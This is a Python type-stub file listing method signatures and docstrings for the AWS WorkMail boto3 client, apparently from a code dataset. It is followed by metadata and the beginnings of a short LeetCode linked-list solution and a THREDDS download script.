documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.describe_user)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#describe_user)\n \"\"\"\n def disassociate_delegate_from_resource(\n self, *, OrganizationId: str, ResourceId: str, EntityId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Removes a member from the resource's set of delegates.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.disassociate_delegate_from_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#disassociate_delegate_from_resource)\n \"\"\"\n def disassociate_member_from_group(\n self, *, OrganizationId: str, GroupId: str, MemberId: str\n ) -> Dict[str, Any]:\n \"\"\"\n Removes a member from a group.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.disassociate_member_from_group)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#disassociate_member_from_group)\n \"\"\"\n def generate_presigned_url(\n self,\n ClientMethod: str,\n Params: Dict[str, Any] = None,\n ExpiresIn: int = 3600,\n HttpMethod: str = None,\n ) -> str:\n \"\"\"\n Generate a presigned url given a client, its method, and arguments.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.generate_presigned_url)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#generate_presigned_url)\n \"\"\"\n def get_access_control_effect(\n self,\n *,\n OrganizationId: str,\n IpAddress: str,\n Action: str,\n UserId: str = None,\n ImpersonationRoleId: str = None\n ) -> GetAccessControlEffectResponseTypeDef:\n \"\"\"\n Gets the effects of an organization's access control rules as they apply to a\n specified IPv4 address, access protocol action, and user ID or impersonation\n role ID.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_access_control_effect)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_access_control_effect)\n \"\"\"\n def get_default_retention_policy(\n self, *, OrganizationId: str\n ) -> GetDefaultRetentionPolicyResponseTypeDef:\n \"\"\"\n Gets the default retention policy details for the specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_default_retention_policy)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_default_retention_policy)\n \"\"\"\n def get_impersonation_role(\n self, *, OrganizationId: str, ImpersonationRoleId: str\n ) -> GetImpersonationRoleResponseTypeDef:\n \"\"\"\n Gets the impersonation role details for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_impersonation_role)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_impersonation_role)\n \"\"\"\n def 
get_impersonation_role_effect(\n self, *, OrganizationId: str, ImpersonationRoleId: str, TargetUser: str\n ) -> GetImpersonationRoleEffectResponseTypeDef:\n \"\"\"\n Tests whether the given impersonation role can impersonate a target user.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_impersonation_role_effect)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_impersonation_role_effect)\n \"\"\"\n def get_mail_domain(\n self, *, OrganizationId: str, DomainName: str\n ) -> GetMailDomainResponseTypeDef:\n \"\"\"\n Gets details for a mail domain, including domain records required to configure\n your domain with recommended security.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_mail_domain)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_mail_domain)\n \"\"\"\n def get_mailbox_details(\n self, *, OrganizationId: str, UserId: str\n ) -> GetMailboxDetailsResponseTypeDef:\n \"\"\"\n Requests a user's mailbox details for a specified organization and user.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_mailbox_details)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_mailbox_details)\n \"\"\"\n def get_mobile_device_access_effect(\n self,\n *,\n OrganizationId: str,\n DeviceType: str = None,\n DeviceModel: str = None,\n DeviceOperatingSystem: str = None,\n DeviceUserAgent: str = None\n ) -> GetMobileDeviceAccessEffectResponseTypeDef:\n \"\"\"\n Simulates the effect of the mobile device access rules for the given attributes\n of a sample access event.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_mobile_device_access_effect)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_mobile_device_access_effect)\n \"\"\"\n def get_mobile_device_access_override(\n self, *, OrganizationId: str, UserId: str, DeviceId: str\n ) -> GetMobileDeviceAccessOverrideResponseTypeDef:\n \"\"\"\n Gets the mobile device access override for the given WorkMail organization,\n user, and device.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.get_mobile_device_access_override)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#get_mobile_device_access_override)\n \"\"\"\n def list_access_control_rules(\n self, *, OrganizationId: str\n ) -> ListAccessControlRulesResponseTypeDef:\n \"\"\"\n Lists the access control rules for the specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_access_control_rules)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_access_control_rules)\n \"\"\"\n def list_aliases(\n self, *, OrganizationId: str, EntityId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListAliasesResponseTypeDef:\n \"\"\"\n Creates a paginated call to list the aliases associated 
with a given entity.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_aliases)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_aliases)\n \"\"\"\n def list_availability_configurations(\n self, *, OrganizationId: str, MaxResults: int = None, NextToken: str = None\n ) -> ListAvailabilityConfigurationsResponseTypeDef:\n \"\"\"\n List all the `AvailabilityConfiguration` 's for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_availability_configurations)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_availability_configurations)\n \"\"\"\n def list_group_members(\n self, *, OrganizationId: str, GroupId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListGroupMembersResponseTypeDef:\n \"\"\"\n Returns an overview of the members of a group.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_group_members)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_group_members)\n \"\"\"\n def list_groups(\n self, *, OrganizationId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListGroupsResponseTypeDef:\n \"\"\"\n Returns summaries of the organization's groups.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_groups)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_groups)\n \"\"\"\n def list_impersonation_roles(\n self, *, OrganizationId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListImpersonationRolesResponseTypeDef:\n \"\"\"\n Lists all the impersonation roles for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_impersonation_roles)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_impersonation_roles)\n \"\"\"\n def list_mail_domains(\n self, *, OrganizationId: str, MaxResults: int = None, NextToken: str = None\n ) -> ListMailDomainsResponseTypeDef:\n \"\"\"\n Lists the mail domains in a given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_mail_domains)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_mail_domains)\n \"\"\"\n def list_mailbox_export_jobs(\n self, *, OrganizationId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListMailboxExportJobsResponseTypeDef:\n \"\"\"\n Lists the mailbox export jobs started for the specified organization within the\n last seven days.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_mailbox_export_jobs)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_mailbox_export_jobs)\n \"\"\"\n def list_mailbox_permissions(\n self, *, OrganizationId: str, 
EntityId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListMailboxPermissionsResponseTypeDef:\n \"\"\"\n Lists the mailbox permissions associated with a user, group, or resource\n mailbox.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_mailbox_permissions)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_mailbox_permissions)\n \"\"\"\n def list_mobile_device_access_overrides(\n self,\n *,\n OrganizationId: str,\n UserId: str = None,\n DeviceId: str = None,\n NextToken: str = None,\n MaxResults: int = None\n ) -> ListMobileDeviceAccessOverridesResponseTypeDef:\n \"\"\"\n Lists all the mobile device access overrides for any given combination of\n WorkMail organization, user, or device.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_mobile_device_access_overrides)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_mobile_device_access_overrides)\n \"\"\"\n def list_mobile_device_access_rules(\n self, *, OrganizationId: str\n ) -> ListMobileDeviceAccessRulesResponseTypeDef:\n \"\"\"\n Lists the mobile device access rules for the specified WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_mobile_device_access_rules)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_mobile_device_access_rules)\n \"\"\"\n def list_organizations(\n self, *, NextToken: str = None, MaxResults: int = None\n ) -> ListOrganizationsResponseTypeDef:\n \"\"\"\n Returns summaries of the customer's organizations.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_organizations)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_organizations)\n \"\"\"\n def list_resource_delegates(\n self, *, OrganizationId: str, ResourceId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListResourceDelegatesResponseTypeDef:\n \"\"\"\n Lists the delegates associated with a resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_resource_delegates)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_resource_delegates)\n \"\"\"\n def list_resources(\n self, *, OrganizationId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListResourcesResponseTypeDef:\n \"\"\"\n Returns summaries of the organization's resources.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_resources)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_resources)\n \"\"\"\n def list_tags_for_resource(self, *, ResourceARN: str) -> ListTagsForResourceResponseTypeDef:\n \"\"\"\n Lists the tags applied to an WorkMail organization resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_tags_for_resource)\n 
[Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_tags_for_resource)\n \"\"\"\n def list_users(\n self, *, OrganizationId: str, NextToken: str = None, MaxResults: int = None\n ) -> ListUsersResponseTypeDef:\n \"\"\"\n Returns summaries of the organization's users.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.list_users)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#list_users)\n \"\"\"\n def put_access_control_rule(\n self,\n *,\n Name: str,\n Effect: AccessControlRuleEffectType,\n Description: str,\n OrganizationId: str,\n IpRanges: List[str] = None,\n NotIpRanges: List[str] = None,\n Actions: List[str] = None,\n NotActions: List[str] = None,\n UserIds: List[str] = None,\n NotUserIds: List[str] = None,\n ImpersonationRoleIds: List[str] = None,\n NotImpersonationRoleIds: List[str] = None\n ) -> Dict[str, Any]:\n \"\"\"\n Adds a new access control rule for the specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.put_access_control_rule)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#put_access_control_rule)\n \"\"\"\n def put_email_monitoring_configuration(\n self, *, OrganizationId: str, RoleArn: str, LogGroupArn: str\n ) -> Dict[str, Any]:\n \"\"\"\n Creates or updates the email monitoring configuration for a specified\n organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.put_email_monitoring_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#put_email_monitoring_configuration)\n \"\"\"\n def put_inbound_dmarc_settings(self, *, OrganizationId: str, Enforced: bool) -> Dict[str, Any]:\n \"\"\"\n Enables or disables a DMARC policy for a given organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.put_inbound_dmarc_settings)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#put_inbound_dmarc_settings)\n \"\"\"\n def put_mailbox_permissions(\n self,\n *,\n OrganizationId: str,\n EntityId: str,\n GranteeId: str,\n PermissionValues: List[PermissionTypeType]\n ) -> Dict[str, Any]:\n \"\"\"\n Sets permissions for a user, group, or resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.put_mailbox_permissions)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#put_mailbox_permissions)\n \"\"\"\n def put_mobile_device_access_override(\n self,\n *,\n OrganizationId: str,\n UserId: str,\n DeviceId: str,\n Effect: MobileDeviceAccessRuleEffectType,\n Description: str = None\n ) -> Dict[str, Any]:\n \"\"\"\n Creates or updates a mobile device access override for the given WorkMail\n organization, user, and device.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.put_mobile_device_access_override)\n [Show boto3-stubs 
documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#put_mobile_device_access_override)\n \"\"\"\n def put_retention_policy(\n self,\n *,\n OrganizationId: str,\n Name: str,\n FolderConfigurations: List[\"FolderConfigurationTypeDef\"],\n Id: str = None,\n Description: str = None\n ) -> Dict[str, Any]:\n \"\"\"\n Puts a retention policy to the specified organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.put_retention_policy)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#put_retention_policy)\n \"\"\"\n def register_mail_domain(\n self, *, OrganizationId: str, DomainName: str, ClientToken: str = None\n ) -> Dict[str, Any]:\n \"\"\"\n Registers a new domain in WorkMail and SES, and configures it for use by\n WorkMail.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.register_mail_domain)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#register_mail_domain)\n \"\"\"\n def register_to_work_mail(\n self, *, OrganizationId: str, EntityId: str, Email: str\n ) -> Dict[str, Any]:\n \"\"\"\n Registers an existing and disabled user, group, or resource for WorkMail use by\n associating a mailbox and calendaring capabilities.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.register_to_work_mail)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#register_to_work_mail)\n \"\"\"\n def reset_password(self, *, OrganizationId: str, UserId: str, Password: str) -> Dict[str, Any]:\n \"\"\"\n Allows the administrator to reset the password for a user.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.reset_password)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#reset_password)\n \"\"\"\n def start_mailbox_export_job(\n self,\n *,\n ClientToken: str,\n OrganizationId: str,\n EntityId: str,\n RoleArn: str,\n KmsKeyArn: str,\n S3BucketName: str,\n S3Prefix: str,\n Description: str = None\n ) -> StartMailboxExportJobResponseTypeDef:\n \"\"\"\n Starts a mailbox export job to export MIME-format email messages and calendar\n items from the specified mailbox to the specified Amazon Simple Storage Service\n (Amazon S3) bucket.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.start_mailbox_export_job)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#start_mailbox_export_job)\n \"\"\"\n def tag_resource(self, *, ResourceARN: str, Tags: List[\"TagTypeDef\"]) -> Dict[str, Any]:\n \"\"\"\n Applies the specified tags to the specified WorkMail organization resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.tag_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#tag_resource)\n \"\"\"\n def test_availability_configuration(\n self,\n *,\n OrganizationId: str,\n DomainName: str = None,\n EwsProvider: 
\"EwsAvailabilityProviderTypeDef\" = None,\n LambdaProvider: \"LambdaAvailabilityProviderTypeDef\" = None\n ) -> TestAvailabilityConfigurationResponseTypeDef:\n \"\"\"\n Performs a test on an availability provider to ensure that access is allowed.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.test_availability_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#test_availability_configuration)\n \"\"\"\n def untag_resource(self, *, ResourceARN: str, TagKeys: List[str]) -> Dict[str, Any]:\n \"\"\"\n Untags the specified tags from the specified WorkMail organization resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.untag_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#untag_resource)\n \"\"\"\n def update_availability_configuration(\n self,\n *,\n OrganizationId: str,\n DomainName: str,\n EwsProvider: \"EwsAvailabilityProviderTypeDef\" = None,\n LambdaProvider: \"LambdaAvailabilityProviderTypeDef\" = None\n ) -> Dict[str, Any]:\n \"\"\"\n Updates an existing `AvailabilityConfiguration` for the given WorkMail\n organization and domain.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_availability_configuration)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_availability_configuration)\n \"\"\"\n def update_default_mail_domain(self, *, OrganizationId: str, DomainName: str) -> Dict[str, Any]:\n \"\"\"\n Updates the default mail domain for an organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_default_mail_domain)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_default_mail_domain)\n \"\"\"\n def update_impersonation_role(\n self,\n *,\n OrganizationId: str,\n ImpersonationRoleId: str,\n Name: str,\n Type: ImpersonationRoleTypeType,\n Rules: List[\"ImpersonationRuleTypeDef\"],\n Description: str = None\n ) -> Dict[str, Any]:\n \"\"\"\n Updates an impersonation role for the given WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_impersonation_role)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_impersonation_role)\n \"\"\"\n def update_mailbox_quota(\n self, *, OrganizationId: str, UserId: str, MailboxQuota: int\n ) -> Dict[str, Any]:\n \"\"\"\n Updates a user's current mailbox quota for a specified organization and user.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_mailbox_quota)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_mailbox_quota)\n \"\"\"\n def update_mobile_device_access_rule(\n self,\n *,\n OrganizationId: str,\n MobileDeviceAccessRuleId: str,\n Name: str,\n Effect: MobileDeviceAccessRuleEffectType,\n Description: str = None,\n DeviceTypes: List[str] = None,\n NotDeviceTypes: List[str] 
= None,\n DeviceModels: List[str] = None,\n NotDeviceModels: List[str] = None,\n DeviceOperatingSystems: List[str] = None,\n NotDeviceOperatingSystems: List[str] = None,\n DeviceUserAgents: List[str] = None,\n NotDeviceUserAgents: List[str] = None\n ) -> Dict[str, Any]:\n \"\"\"\n Updates a mobile device access rule for the specified WorkMail organization.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_mobile_device_access_rule)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_mobile_device_access_rule)\n \"\"\"\n def update_primary_email_address(\n self, *, OrganizationId: str, EntityId: str, Email: str\n ) -> Dict[str, Any]:\n \"\"\"\n Updates the primary email for a user, group, or resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_primary_email_address)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_primary_email_address)\n \"\"\"\n def update_resource(\n self,\n *,\n OrganizationId: str,\n ResourceId: str,\n Name: str = None,\n BookingOptions: \"BookingOptionsTypeDef\" = None\n ) -> Dict[str, Any]:\n \"\"\"\n Updates data for the resource.\n\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Client.update_resource)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/client.html#update_resource)\n \"\"\"\n @overload\n def get_paginator(self, operation_name: Literal[\"list_aliases\"]) -> ListAliasesPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListAliases)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listaliasespaginator)\n \"\"\"\n @overload\n def get_paginator(\n self, operation_name: Literal[\"list_availability_configurations\"]\n ) -> ListAvailabilityConfigurationsPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListAvailabilityConfigurations)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listavailabilityconfigurationspaginator)\n \"\"\"\n @overload\n def get_paginator(\n self, operation_name: Literal[\"list_group_members\"]\n ) -> ListGroupMembersPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListGroupMembers)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listgroupmemberspaginator)\n \"\"\"\n @overload\n def get_paginator(self, operation_name: Literal[\"list_groups\"]) -> ListGroupsPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListGroups)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listgroupspaginator)\n \"\"\"\n @overload\n def get_paginator(\n self, operation_name: Literal[\"list_mailbox_permissions\"]\n ) -> 
ListMailboxPermissionsPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListMailboxPermissions)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listmailboxpermissionspaginator)\n \"\"\"\n @overload\n def get_paginator(\n self, operation_name: Literal[\"list_organizations\"]\n ) -> ListOrganizationsPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListOrganizations)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listorganizationspaginator)\n \"\"\"\n @overload\n def get_paginator(\n self, operation_name: Literal[\"list_resource_delegates\"]\n ) -> ListResourceDelegatesPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListResourceDelegates)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listresourcedelegatespaginator)\n \"\"\"\n @overload\n def get_paginator(self, operation_name: Literal[\"list_resources\"]) -> ListResourcesPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListResources)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listresourcespaginator)\n \"\"\"\n @overload\n def get_paginator(self, operation_name: Literal[\"list_users\"]) -> ListUsersPaginator:\n \"\"\"\n [Show boto3 documentation](https://boto3.amazonaws.com/v1/documentation/api/1.26.45/reference/services/workmail.html#WorkMail.Paginator.ListUsers)\n [Show boto3-stubs documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_workmail/paginators.html#listuserspaginator)\n \"\"\"\n","sub_path":"typings/mypy_boto3_workmail/client.pyi","file_name":"client.pyi","file_ext":"pyi","file_size_in_byte":57132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"371254267","text":"__author__ = 'ruhuajiang'\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def deleteDuplicates(self, head):\n if not head:\n return\n dummy = ListNode(-1)\n dummy.next = head\n prev = dummy\n slow = head\n fast = slow\n count = 0\n while(fast):\n if fast.val == slow.val:\n fast = fast.next\n count+=1\n continue\n if count > 1:\n prev.next = fast\n slow = fast\n count=0\n else:\n prev = slow\n slow = fast\n count =0\n\n if count > 1:\n prev.next = None\n return dummy.next\n\n\n\n\n\n\n\n\n","sub_path":"leetcode/Remove Duplicates from Sorted List II.py","file_name":"Remove Duplicates from Sorted List II.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"204217083","text":"import click\nimport tarfile\nfrom odc.io.tar import add_txt_file, tar_mode\nfrom odc.thredds import download_yamls, thredds_find_glob\n\n\n@click.command(\"thredds-to-tar\")\n@click.option(\n \"--thredds_catalogue\",\n \"-c\",\n type=str,\n required=True,\n help=\"The THREDDS catalogue endpoint\",\n)\n@click.option(\n 
